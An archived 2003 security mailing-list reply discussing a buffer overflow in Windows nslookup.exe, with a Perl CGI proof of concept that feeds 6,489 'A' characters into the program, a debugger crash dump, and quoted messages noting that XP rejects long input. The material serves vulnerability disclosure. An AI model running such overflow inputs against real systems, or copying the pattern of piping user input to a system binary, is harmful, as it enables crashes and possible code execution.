Re: NSLOOKUP.EXE

From: Ryan Yagatich (ryanyat_private)
Date: Fri Mar 21 2003 - 09:04:49 PST

  • Next message: Adrian S: "Detecting abnormal behaviour" 

    ==begin silly.cgi

#!perl -w

use strict;
print "Content-type: text/html\n\n";

open(NSLOOKUP,"|nslookup.exe") || die "Could not open nslookup.exe (path?)";
        print NSLOOKUP "A" x 6489;
close(NSLOOKUP);

==end silly.cgi

MSDE:
Unhandled exception at 0x01004d65 in NSLOOKUP.EXE: 0xC0000005: Access 
violation writing location 0x0103e000.

     01004D5D  cmp         esi,100F770h 
     01004D63  je          01004D6F 
---> 01004D65  mov         dword ptr [edi],esi 
     01004D67  add         edi,4 
     01004D6A  jmp         01004C37 


01004D65 = 16797029

,_____________________________________________________,
\ Ryan Yagatich                     supportat_private \
/ Pantek Incorporated                  (877) LINUX-FIX /
\ http://www.pantek.com/security        (440) 519-1802 \
/       Are your networks secure? Are you certain?     /
\___A4536371BF88C57DB181799D00BCA331E6AD909D297C3493___\

On Thu, 20 Mar 2003, Blue Boar wrote:

>Patrick Webster wrote:
>> Can you do anything interesting with this?:
>> 
>> C:\>nslookup
>> Default Server:  dns.server.net
>> Address:  111.222.333.444
>> 
>> 
>>>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>> 
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>> 
>> Gives error: memory can't be "read" - 0x414141 (aka A).
>
>If you have to manually type all the A's, then probably not.  Maybe if 
>someone did something silly like make a CGI script that calls nslookup.exe 
>directly with user input.
>
>What OS are you testing on?  It looks like it's fixed in XP:
>
>C:\winxp\system32>nslookup
>Default Server:  dns1.snfcca.sbcglobal.net
>Address:  206.13.28.12
>
> > 
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>*** Input is too long
> >
>
>
>					BB
>

    This archive was generated by hypermail 2b30 : Fri Mar 21 2003 - 10:51:11 PST